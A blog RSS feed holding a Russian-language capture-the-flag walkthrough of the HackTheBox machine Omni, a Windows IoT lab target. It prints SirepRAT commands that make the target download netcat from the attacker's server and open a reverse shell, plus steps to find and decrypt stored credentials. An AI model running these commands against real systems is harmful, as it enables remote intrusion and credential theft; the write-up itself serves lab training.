<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>GhostCorp</title><generator>teletype.in</generator><description><![CDATA[GhostCorp]]></description><image><url>https://img3.teletype.in/files/ef/63/ef631dff-93d3-4443-90c7-252b11e075db.png</url><title>GhostCorp</title><link>https://teletype.in/@goldycorp</link></image><link>https://teletype.in/@goldycorp?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=goldycorp</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/goldycorp?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/goldycorp?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Thu, 02 Jul 2026 22:58:46 GMT</pubDate><lastBuildDate>Thu, 02 Jul 2026 22:58:46 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@goldycorp/At8aIiTALUA</guid><link>https://teletype.in/@goldycorp/At8aIiTALUA?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=goldycorp</link><comments>https://teletype.in/@goldycorp/At8aIiTALUA?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=goldycorp#comments</comments><dc:creator>goldycorp</dc:creator><title>Пентест лёгеньких Windows IoT систем</title><pubDate>Thu, 02 Jul 2026 19:28:05 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/91/5e/915e76aa-d664-4c2e-9b21-fa7890c331ff.png"></media:content><description><![CDATA[<img src="https://img4.teletype.in/files/bd/92/bd9260c7-3769-4d0c-a9d4-bf00a77dce3f.jpeg"></img>!Я лишь популяризирую данный контент!]]></description><content:encoded><![CDATA[
  <p id="QW1N">!Я лишь популяризирую данный контент!</p>
  <p id="m9Oh">В статье описанно прохождение машины Omni с HACKTHEBOX</p>
  <p id="5xBo"></p>
  <h2 id="nsxc">Recon</h2>
  <p id="AXZt">Данная машина имеет IP адрес 10.10.10.204, который я добавляю в /etc/hosts.</p>
  <p id="mJXU">Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент - адрес сканируемого хоста:</p>
  <p id="1H73"></p>
  <pre id="o9qR">#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &#x27;/&#x27; -f 1 | tr &#x27;\n&#x27; &#x27;,&#x27; | sed s/,$//)nmap -p$ports -A $1</pre>
  <figure id="plbv" class="m_original">
    <img src="https://img3.teletype.in/files/66/c3/66c3caef-6366-40d6-bba1-074d9d41af59.jpeg" width="980" />
  </figure>
  <p id="ZUYG">Много открытых портов, при этом на 8080 нас встречает HTTP аутентификация “Windows Device Portal”. Давайте узнаем что это:</p>
  <p id="LrEc"></p>
  <figure id="cT0y" class="m_original">
    <img src="https://img1.teletype.in/files/07/11/071107cd-8748-46e7-a288-76e964dc28bf.jpeg" width="972" />
  </figure>
  <p id="IfKu"></p>
  <p id="01Ko">Таким образом, это IoT мы можем найти найт</p>
  <p id="4yuN"></p>
  <p id="6jYV">и соответствующий популярный эксплоит SirepRAT.</p>
  <h3 id="AJti">Entry Point</h3>
  <p id="v6Rk">Запускаем на локальной машине веб сервер.</p>
  <pre id="5mSJ">sudo python3 -m http.server 80</pre>
  <p id="j8uY">Скачаем на удаленную машину netcat, запустим листенер и выполним реверс шелл с помощью netcat.</p>
  <pre id="BrV1">python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd &quot;C:\Windows\System32\cmd.exe&quot; --args &quot;/c powershell IWR -Uri http://10.10.14.112/nc64.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe&quot; python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd &quot;C:\Windows\System32\cmd.exe&quot; --args &quot;/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.112 4321&quot; --v</pre>
  <p id="YSx4">Получаем оболочку</p>
  <p id="9Nzu"></p>
  <figure id="FufB" class="m_original">
    <img src="https://img4.teletype.in/files/bf/60/bf601188-4d01-4bf9-b8a1-4270954d5a31.jpeg" width="968" />
  </figure>
  <p id="8UU5">Из программного обеспечения имеется только PowerShell. Просмотрим все файлы, включая вложенные директории, с целью найти что-нибудь интересное. И мы находим.</p>
  <pre id="Bttl">Get-ChildItem -Path &quot;C:\Program Files&quot;  –Recurse -force</pre>
  <figure id="ieH7" class="m_original">
    <img src="https://img2.teletype.in/files/9c/86/9c8689b5-29fe-4bcf-8004-0bc35305add3.jpeg" width="978" />
  </figure>
  <figure id="2yUm" class="m_original">
    <img src="https://img4.teletype.in/files/7c/59/7c5957c7-bc48-4692-923f-3cb2457b4d08.jpeg" width="980" />
  </figure>
  <p id="gJT9">В данном файле находим учетные данные двух пользователей. Давайте авторизуемся на веб сервере. И в консоле кинем еще один реверс шелл.</p>
  <h3 id="ZIMX">Users </h3>
  <figure id="lK9k" class="m_original">
    <img src="https://img2.teletype.in/files/55/85/5585e6ce-9f36-4ce0-a5f2-b726762eac73.jpeg" width="999" />
  </figure>
  <figure id="ggS0" class="m_original">
    <img src="https://img4.teletype.in/files/b8/e2/b8e2acc0-eec9-4c2b-bd10-ccb8a5d3ac83.jpeg" width="970" />
  </figure>
  <p id="Fprv">Но сразу забрать флаг не вышло.</p>
  <p id="smNB"></p>
  <figure id="nTaP" class="m_original">
    <img src="https://img3.teletype.in/files/64/86/648698b0-ba13-4e4f-aeea-e338498b3638.jpeg" width="984" />
  </figure>
  <p id="B2Lp">Давайте декодируем пароль</p>
  <p id="Mxc6"></p>
  <pre id="T8IN">$userTXT = Import-CliXml -Path C:\Data\Users\app\user.txt
$userTXT.GetNetworkCredential().Password</pre>
  <h3 id="QWvF">Root</h3>
  <p id="wcd6"></p>
  <p id="6Mgy">Теперь проделаем все те же функции от имени администратора.</p>
  <figure id="QywX" class="m_original">
    <img src="https://img4.teletype.in/files/70/6c/706c4f71-c27f-419a-9b9c-89cdbef68814.jpeg" width="1079" />
  </figure>
  <figure id="RRSB" class="m_original">
    <img src="https://img3.teletype.in/files/a9/f7/a9f72259-1c74-40f8-a9ed-c3a6d455c6b4.jpeg" width="987" />
  </figure>
  <figure id="mJQ5" class="m_original">
    <img src="https://img1.teletype.in/files/cd/71/cd71b376-d2ca-4a36-826a-a2383d7f470b.jpeg" width="987" />
  </figure>
  <figure id="rDeD" class="m_original">
    <img src="https://img1.teletype.in/files/83/90/8390c64f-ad51-4597-89bd-7d2cd8989a82.jpeg" width="994" />
  </figure>
  <p id="6rsJ">Машина пройдена!</p>
  <p id="bpD5">Ист habr.ru</p>
  <p id="RbTe">@rxeto @rxeto @rxeto</p>

]]></content:encoded></item></channel></rss>